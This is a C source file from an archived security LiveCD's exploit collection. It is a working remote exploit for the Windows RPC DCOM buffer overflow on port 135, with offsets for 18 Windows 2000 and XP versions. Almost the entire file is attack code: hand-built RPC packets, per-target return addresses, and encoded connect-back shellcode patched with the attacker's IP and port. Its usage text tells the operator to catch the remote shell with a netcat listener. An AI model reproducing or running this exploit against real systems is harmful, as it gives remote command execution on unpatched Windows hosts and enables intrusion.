home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / rpc18.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  16KB  |  372 lines
  1. //////////////////////////////////////////////////////////////////////////////////////////////
  2. //
  3. //             Windows RPC DCOM Remote Exploit with 18 Targets
  4. //                  by pHrail and smurfy + some offsets by teos
  5. //            
  6. //  Targets: 
  7. //                0 Win2k Polish nosp ver 5.00.2195
  8. //                1 Win2k Polish +sp3 ver 5.00.2195
  9. //                2 Win2k Spanish +sp4
  10. //                3 Win2k English nosp 1
  11. //                4 Win2k English nosp 2
  12. //                5 Win2k English +sp1
  13. //                6 Win2k English +sp2 1
  14. //                7 Win2k English +sp2 2
  15. //                8 Win2k English +sp3 1
  16. //                9 Win2k English +sp3 2
  17. //                10 Win2k English +sp4
  18. //                11 Win2k China +sp3
  19. //                12 Win2k China +sp4
  20. //                13 Win2k German +sp3
  21. //                14 Win2k Japanese +sp2
  22. //                15 WinXP English nosp ver 5.1.2600
  23. //                16 WinXP English +sp1 1
  24. //                17 WinXP English +sp1 2
  25. //                18 WinXP English +sp2
  26. //
  27. //////////////////////////////////////////////////////////////////////////////////////////////
  28.  
  29.  
  30.  
  31. #include <stdio.h>
  32. #include <stdlib.h>
  33. #include <unistd.h>
  34. #include <errno.h>
  35. #include <string.h>
  36. #include <netdb.h>
  37. #include <sys/types.h>
  38. #include <netinet/in.h>
  39. #include <sys/socket.h>
  40.  
  41. #define DWORD unsigned long
  42. #define SOCKET_ERROR -1
  43.  
  44. unsigned char bindstr[]={
  45. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
  46. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
  47. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
  48. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
  49. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  50.  
  51. unsigned char request1[]={
  52. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
  53. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
  54. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
  55. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
  56. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
  57. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
  58. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
  59. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
  60. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
  61. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  62. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
  63. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
  64. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
  65. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
  66. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  67. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
  68. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
  69. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
  70. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
  71. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
  72. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
  73. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
  74. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
  75. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
  76. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
  77. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
  78. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
  79. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  80. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  81. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  82. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  83. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
  84. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
  85. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
  86. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
  87. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
  88. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
  89. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
  90. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  91. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
  92. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
  93. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
  94. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
  95. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
  96. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
  97. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  98. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
  99. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
  100. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  101. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
  102. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
  103. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  104. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
  105. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
  106. ,0x00,0x00,0x00,0x00,0x00,0x00};
  107.  
  108. unsigned char request2[]={
  109. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
  110. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
  111.  
  112. unsigned char request3[]={
  113. 0x5C,0x00
  114. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
  115. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  116. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
  117. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  118.  
  119.  
  120.  
  121. /* Myam add OFFSETS*/
  122. char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
  123. char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
  124. char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
  125. char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
  126. char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
  127. char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
  128. char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
  129. char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
  130. char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
  131. char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
  132. char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
  133. char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
  134. char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
  135. char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
  136. char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
  137. char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
  138. char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
  139. char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
  140. char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */
  141.  
  142.  
  143.  
  144.  
  145.  
  146. /* Test this offset
  147. ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
  148. Windows 2000 (no-service-pack) English 0x77e33f6d
  149. 0x77f92a9b
  150. 0x77e2afc5
  151. 0x772254b0 win2k3
  152. 0x77E829E3 / 0x77E83587 kokanin win2k sp3
  153. */ 
  154. unsigned char sc[]=
  155. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  156. "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  157. "\x46\x00\x58\x00\x46\x00\x58\x00"
  158.  
  159.  
  160. "\x29\x4c\xdf\x77" //sp4
  161. //"\x29\x2c\xe2\x77"//0x77e22c29
  162.  
  163.  
  164. "\x38\x6e\x16\x76\x0d\x6e\x16\x76" 
  165. //下面是SHELLCODE,可以
  166. //SHELLCODE不存在0X00,0X00与0X5C
  167. "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
  168. "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
  169. "\x93\x40\xe2\xfa"
  170. // code 
  171. "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
  172. "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
  173. "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
  174. "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
  175. "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
  176. "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
  177. "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
  178. "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
  179. "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
  180. "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
  181. "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
  182. "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
  183. "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
  184. "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
  185. "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
  186. "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
  187. "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
  188. "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
  189. "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
  190. "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
  191. "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
  192. "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
  193. "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
  194. "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
  195. "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
  196. "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
  197. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  198.  
  199. unsigned char request4[]={
  200. 0x01,0x10
  201. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
  202. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
  203. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
  204. };
  205.  
  206. int main(int argc,char ** argv)
  207. {
  208.  
  209. int len, len1, sockfd;
  210. short port=135;
  211. struct hostent *he;
  212. struct sockaddr_in their_addr;
  213.  
  214.  
  215. unsigned char buf1[0x1000];
  216. unsigned char buf2[0x1000];
  217. unsigned short port1;
  218.  
  219.  
  220. DWORD cb;
  221.  
  222.  
  223.  
  224. printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");
  225.  
  226.  
  227. if(argc<5)
  228. {
  229.  
  230. printf("[<$>] OC192 RPC Remote Windows Exploit\n");
  231. printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
  232. printf("[<$>] Thanks to LSD and XForce\n");
  233. printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
  234. printf("[<$>] On connect back nc -lp cbport\n");
  235. printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
  236. printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
  237. printf("[<$>] 2 Win2k Spanish +sp4\n");
  238. printf("[<$>] 3 Win2k English nosp 1\n");
  239. printf("[<$>] 4 Win2k English nosp 2\n");
  240. printf("[<$>] 5 Win2k English +sp1\n");
  241. printf("[<$>] 6 Win2k English +sp2 1\n");
  242. printf("[<$>] 7 Win2k English +sp2 2\n");
  243. printf("[<$>] 8 Win2k English +sp3 1\n");
  244. printf("[<$>] 9 Win2k English +sp3 2\n");
  245. printf("[<$>] 10 Win2k English +sp4\n");
  246. printf("[<$>] 11 Win2k China +sp3\n");
  247. printf("[<$>] 12 Win2k China +sp4\n");
  248. printf("[<$>] 13 Win2k German +sp3\n");
  249. printf("[<$>] 14 Win2k Japanese +sp2\n");
  250. printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
  251. printf("[<$>] 16 WinXP English +sp1 1\n");
  252. printf("[<$>] 17 WinXP English +sp1 2\n");
  253. printf("[<$>] 18 WinXP English +sp2\n");
  254. exit(1);
  255. }
  256.  
  257.  
  258. if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
  259.  
  260. perror("gethostbyname");
  261.  
  262. exit(1);
  263.  
  264. }
  265.  
  266. if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  267.  
  268. perror("socket");
  269.  
  270. exit(1);
  271.  
  272. }
  273.  
  274.  
  275. their_addr.sin_family = AF_INET;
  276. their_addr.sin_port = htons(port);
  277. their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  278. memset(&(their_addr.sin_zero), '\0', 8);
  279.  
  280.  
  281. if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
  282. printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);
  283.  
  284. exit(1);
  285. }
  286.  
  287.  
  288.  
  289. if(atoi(argv[4])==0)
  290. memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
  291. else if (atoi(argv[4])==1)
  292. memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
  293. else if (atoi(argv[4])==2)
  294. memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
  295. else if (atoi(argv[4])==3)
  296. memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
  297. else if (atoi(argv[4])==4)
  298. memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
  299. else if (atoi(argv[4])==5)
  300. memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
  301. else if (atoi(argv[4])==6)
  302. memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
  303. else if (atoi(argv[4])==7)
  304. memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
  305. else if (atoi(argv[4])==8)
  306. memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
  307. else if (atoi(argv[4])==9)
  308. memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
  309. else if (atoi(argv[4])==10)
  310. memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
  311. else if (atoi(argv[4])==11)
  312. memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
  313. else if (atoi(argv[4])==12)
  314. memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
  315. else if (atoi(argv[4])==13)
  316. memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
  317. else if (atoi(argv[4])==14)
  318. memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
  319. else if (atoi(argv[4])==15)
  320. memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
  321. else if (atoi(argv[4])==16)
  322. memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
  323. else if (atoi(argv[4])==17)
  324. memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
  325. else if (atoi(argv[4])==18)
  326. memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
  327. port1 = htons(atoi(argv[3]));
  328. port1 ^= 0x9393;
  329. cb=inet_addr(argv[2]); 
  330. cb ^= 0x93939393;
  331. *(unsigned short *)&sc[330+0x30] = port1;
  332. *(unsigned int *)&sc[335+0x30] = cb;
  333. len=sizeof(sc);
  334. memcpy(buf2,request1,sizeof(request1));
  335. len1=sizeof(request1);
  336.  
  337. *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
  338. *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
  339. memcpy(buf2+len1,request2,sizeof(request2));
  340. len1=len1+sizeof(request2);
  341. memcpy(buf2+len1,sc,sizeof(sc));
  342. len1=len1+sizeof(sc);
  343. memcpy(buf2+len1,request3,sizeof(request3));
  344. len1=len1+sizeof(request3);
  345. memcpy(buf2+len1,request4,sizeof(request4));
  346. len1=len1+sizeof(request4);
  347. *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
  348.  
  349. *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc; 
  350. *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
  351. *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
  352. *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
  353. *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
  354. *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
  355. *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
  356.  
  357.  
  358.  
  359. if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
  360. printf("Send failed pussy.\n");
  361. exit(1);
  362. }
  363.  
  364. len=recv(sockfd,buf1,1000,NULL);
  365. if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {
  366.  
  367. printf("Send failed pussy\n");
  368. return;
  369. }
  370. len=recv(sockfd,buf1,1024,NULL);
  371.  
  372. }